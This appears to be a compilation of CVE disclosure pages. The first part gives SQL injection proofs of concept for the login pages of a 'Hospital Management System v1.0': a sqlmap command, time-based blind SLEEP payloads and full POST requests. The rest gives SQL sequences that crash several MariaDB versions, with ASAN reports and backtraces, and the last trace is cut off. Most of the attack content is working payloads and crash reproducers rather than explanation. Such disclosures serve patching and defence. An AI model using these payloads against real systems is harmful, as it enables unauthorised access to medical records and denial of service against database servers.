The vulnerability page is doctorlogin.php

http://your-ip/hms/doctorlogin.php

Hospital-Management-System v1.0

The loginid parameter in the doctorlogin.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

python sqlmap.py -r Your post packet.txt --random-agent --risk=3 --level=3 -dbs

\[+\] Payloads:

    Parameter: loginid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: loginid=test' AND (SELECT 1110 FROM (SELECT(SLEEP(5)))pvXE) AND 'crsy'='crsy&password=test123&submit=Login
    

\[+\]POST request package

    POST /hms/doctorlogin.php HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 42
    Origin: http://192.168.74.136
    Connection: close
    Referer: http://192.168.74.136/hms/doctorlogin.php
    Cookie: PHPSESSID=sbgmgg8q26ri1tmnqfv7poto25
    Upgrade-Insecure-Requests: 1
    
    loginid=test&password=test123&submit=Login
    

**In action:**

**Proof and Exploit:**

example2.mp4

CVE-2022-32094: GitHub - Danie1233/Hospital-Management-System-v1.0-SQLi-3

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the loginid parameter at adminlogin.php.

The loginid parameter in the adminlogin.php page appears to be vulnerable to SQL injection attacks.

    Parameter: loginid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: loginid=admin' AND (SELECT 9671 FROM (SELECT(SLEEP(5)))YbRn) AND 'GZcK'='GZcK&password=admin123&submit=Login
    

    POST /hms/adminlogin.php HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 44
    Origin: http://192.168.74.136
    Connection: close
    Referer: http://192.168.74.136/hms/adminlogin.php
    Cookie: PHPSESSID=sbgmgg8q26ri1tmnqfv7poto25
    Upgrade-Insecure-Requests: 1
    
    loginid=admin&password=admin123&submit=Login

CVE-2022-32093: GitHub - Danie1233/Hospital-Management-System-v1.0-SQLi-2

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component sub_select.

step to reproduce:

CREATE TABLE v0 ( v1 DECIMAL UNIQUE CHECK ( CASE 0 \* 27302337.000000 WHEN 34 THEN + 'x' LIKE 'x' OR v1 NOT IN ( -1 / TRUE ^ 2 ) ELSE 7105743.000000 END ) ) ;

 INSERT INTO v0 VALUES ( 90 ) , ( -1 ) , ( 31152443.000000 ) , ( -32768 ) , ( NULL ) , ( NULL ) ;

 INSERT INTO v0 SELECT AVG ( 'x' ) OVER ( PARTITION BY ( ( NOT AVG ( 76698761.000000 ) ) ) IS NOT NULL ) ;

 INSERT IGNORE INTO v0 ( ) VALUES ( 0 ) , ( 'x' ) , ( 3751286.000000 ) , ( 'x' ) , ( ( v1 = 'x' AND 0 AND 0 ) ) ;

 INSERT INTO v0 VALUES ( 127 ) ;

 INSERT INTO v0 SELECT -2147483648 END FROM v0 AS TEXT JOIN v0 JOIN v0 TABLES ;

 ALTER TABLE v0 ADD ( v2 INT UNIQUE CHECK ( ( v1 = 'x' AND ( ( - ( + ( BINARY 49730460.000000 ) ) ) ) = 'x' BETWEEN 'x' AND 'x' ) ) ) ;

 UPDATE v0 SET v1 = -128 WHERE v1 IS NULL ORDER BY 78 IN ( 'x' , 'x' ) , v1 ;

report (compiled with ASAN):

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f4adf25c850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f4afeb08c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55a35785f747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55a356827120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f4afe4f2870\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 SELECT AVG ( 'x' ) OVER ( PARTITION BY ( ( NOT AVG ( 76698761.000000 ) ) ) IS NOT NULL )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/3

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

gdb bt:

#0  0x00007f4afe4ef808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055a35682706b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x0000000000000000 in ?? ()

#4  0x000055a3561b9ee7 in sub\_select (join=0x629000089208, join\_tab=0x629000089c88, end\_of\_records=false) at /experiment/mariadb-server/sql/sql\_select.cc:21052

#5  0x000055a35625eb8d in do\_select (procedure=0x0, join=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:20602

#6  JOIN::exec\_inner (this=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:4735

#7  0x000055a356260593 in JOIN::exec (this=this@entry=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:4513

#8  0x000055a356258b5b in mysql\_select (thd=0x62b0000bd218, tables=<optimized out>, fields=..., conds=<optimized out>, og\_num=0, order=0x0, group=0x0, having=0x0, proc\_param=0x0, select\_options=<optimized out>, result=0x629000089140, unit=0x62b0000c13c0, select\_lex=0x629000087ad0)

    at /experiment/mariadb-server/sql/sql\_select.cc:4991

#9  0x000055a35625a655 in handle\_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x629000089140, setup\_tables\_done\_option=setup\_tables\_done\_option@entry=1073741824) at /experiment/mariadb-server/sql/sql\_select.cc:545

#10 0x000055a3560c99c1 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4711

#11 0x000055a3560cc5a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#12 0x000055a3560d260c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#13 0x000055a3560d773d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#14 0x000055a356492e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#15 0x000055a35649333d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#16 0x000055a356f23c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#17 0x00007f4afe4e8259 in start\_thread () from /usr/lib/libpthread.so.0

#18 0x00007f4afe0935e3 in clone () from /usr/lib/libc.so.6

CVE-2022-32084: [MDEV-26427] MariaDB Server SEGV issue

MariaDB v10.5 to v10.7 was discovered to contain a segmentation fault via the component st_select_lex_unit::exclude_level.

PoC:

KILL STRCMP ( 'x' = 47051287.000000 , TIME ( NOT 'x' IN ( SELECT -32768 ) ) MOD 44 ) ;

crash log:

Version: '10.7.0-MariaDB' socket: '/tmp/12.socket' port: 10012 Source distribution  
210816 15:00:02 \[ERROR\] mysqld got signal 11 ;  
This could be because you hit a bug. It is also possible that this binary  
or one of the libraries it was linked against is corrupt, improperly built,  
or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help  
diagnose the problem, but since we have already crashed,  
something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB  
key\_buffer\_size=134217728  
read\_buffer\_size=131072  
max\_used\_connections=1  
max\_threads=153  
thread\_count=1  
It is possible that mysqld could use up to  
key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K bytes of memory  
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218  
Attempting backtrace. You can use the following information to find out  
where mysqld died. If you see no messages after this, something went  
terribly wrong...  
stack\_bottom = 0x7f677d93c850 thread\_stack 0x5fc00  
sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f679d1e8c3e\]  
mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55ea78116747\]  
sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55ea770de120\]  
sigaction.c:0(\_\_restore\_rt)\[0x7f679cbd2870\]  
sql/sql\_lex.cc:3315(st\_select\_lex\_unit::exclude\_level())\[0x55ea768e1518\]  
sql/item\_subselect.cc:322(Item\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55ea773cff8c\]  
sql/item\_subselect.cc:3562(Item\_in\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55ea773d0c62\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_cmpfunc.cc:6455(Item\_func\_not::fix\_fields(THD\*, Item\*\*))\[0x55ea771cd8c2\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55ea7698f9d4\]  
sql/sql\_parse.cc:5523(mysql\_execute\_command(THD\*, bool))\[0x55ea76978d5e\]  
sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55ea769835a1\]  
sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55ea7698960c\]  
sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55ea7698e73d\]  
sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55ea76d49e57\]  
sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55ea76d4a33d\]  
perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55ea777dac2c\]  
pthread\_create.c:0(start\_thread)\[0x7f679cbc8259\]  
:0(\__GI_\_\_clone)\[0x7f679c7735e3\]

Trying to get some variables.  
Some pointers may be invalid and cause the dump to abort.  
Query (0x629000087238): KILL STRCMP ( 'x' = 47051287.000000 , TIME ( NOT 'x' IN ( SELECT -32768 ) ) MOD 44 )

Connection ID (thread ID): 4  
Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains  
information that should help you find out what is causing the crash.  
Writing a core file...

CVE-2022-32089: [MDEV-26410] MariaDB server crash in st_select_lex_unit::exclude_level

MariaDB v10.7 was discovered to contain an use-after-poison in in __interceptor_memset at /libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc.

CREATE TABLE v0 ( v2 BIGINT , v1 BIGINT ) ENGINE = MEMORY ROW\_FORMAT = COMPRESSED AS SELECT 59218101.000000 AS v3 UNION SELECT FALSE ;

 START TRANSACTION ;

 SELECT instr ( v1 , DES\_ENCRYPT ( 'x' REGEXP 'x' , 'x' ) ) BETWEEN v3 AND -1 FROM v0 ;

 SELECT DISTINCT v2 IN ( COLLATION ( AVG ( 'x' ) ) + -128 , 'x' , 'x' ) FROM v0 WHERE v2 IS NOT NULL ;

 UPDATE v0 SET v2 = v3 + 69 ;

 INSERT INTO v0 ( ) SELECT v1 , v1 FROM v0 ;

\=================================================================

\==2933067==ERROR: AddressSanitizer: use-after-poison on address 0x6290000a6080 at pc 0x7fb1687ce7b7 bp 0x7fb1435a5730 sp 0x7fb1435a4ed8

WRITE of size 944 at 0x6290000a6080 thread T14

    #0 0x7fb1687ce7b6 in \_\_interceptor\_memset /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799

    #1 0x55c6bfcc41e9 in JOIN::make\_aggr\_tables\_info() /experiment/mariadb-server/sql/sql\_select.cc:3694

    #2 0x55c6bfcf2e71 in JOIN::optimize\_stage2() /experiment/mariadb-server/sql/sql\_select.cc:3225

    #3 0x55c6bfcfcd06 in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2479

    #4 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #5 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #6 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #7 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #8 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #9 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #16 0x7fb167d655e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6290000a6080 is located 3712 bytes inside of 16400-byte region \[0x6290000a5200,0x6290000a9210)

allocated by thread T14 here:

    #0 0x7fb16884c279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55c6c12fc9a8 in my\_malloc /experiment/mariadb-server/mysys/my\_malloc.c:90

    #2 0x55c6c12e9414 in alloc\_root /experiment/mariadb-server/mysys/my\_alloc.c:332

    #3 0x55c6bfc3d047 in Query\_arena::alloc(unsigned long) /experiment/mariadb-server/sql/sql\_class.h:1206

    #4 0x55c6bfc3d047 in update\_ref\_and\_keys /experiment/mariadb-server/sql/sql\_select.cc:7110

    #5 0x55c6bfce537e in make\_join\_statistics /experiment/mariadb-server/sql/sql\_select.cc:5377

    #6 0x55c6bfcfc73b in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2453

    #7 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #8 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #9 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #10 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #11 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #12 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #13 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #14 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #15 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #16 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #17 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #18 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7fb1687edfa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55c6c09c9ea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55c6c09c9ea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55c6bf83ab3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55c6bf83ab3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55c6bf8467b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55c6bf84736f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55c6bf84aa52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7fb167c8eb24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799 in \_\_interceptor\_memset

Shadow bytes around the buggy address:

  0x0c528000cbc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

\=>0x0c528000cc10:\[f7\]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc30: 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc40: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc50: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2933067==ABORTING

CVE-2022-32091: [MDEV-26431] MariaDB Server use-after-poison - Jira

MariaDB v10.4 to v10.7 was discovered to contain an use-after-poison in prepare_inplace_add_virtual at /storage/innobase/handler/handler0alter.cc.

CREATE TABLE v0 ( v1 TIME NOT NULL PRIMARY KEY ) ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( lpad ( 'x' , NULL = 32 , 'x' ) ) STORED ;

 SHOW LOCAL STATUS WHERE COALESCE ( 27 , 51 - 39 ) = 'x' ;

 DELETE FROM v0 WHERE 44707452.000000 ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( v1 + v1 ) , DROP COLUMN v0 ;

 SELECT COUNT ( \* ) FROM v0 WHERE v1 = -128 AND v1 = 'x' ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 14:49:19 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:49:19 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:49:19 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:49:19 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:49:19 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:49:26 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:49:26 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:49:26 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:49:26 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:49:26 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 14:49:26 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/19/ib\_buffer\_pool

2021-08-16 14:49:26 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:49:28 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:49:28

2021-08-16 14:49:28 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/19.socket'  port: 10019  Source distribution

\=================================================================

\==2119277==ERROR: AddressSanitizer: use-after-poison on address 0x6190000d6d60 at pc 0x55a3184baacf bp 0x7f47ed829920 sp 0x7f47ed829910

WRITE of size 64 at 0x6190000d6d60 thread T14

    #0 0x55a3184baace in prepare\_inplace\_add\_virtual /experiment/mariadb-server/sql/field.h:1395

    #1 0x55a3184cc1db in prepare\_inplace\_alter\_table\_dict /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:6206

    #2 0x55a3184d9f06 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:8270

    #3 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

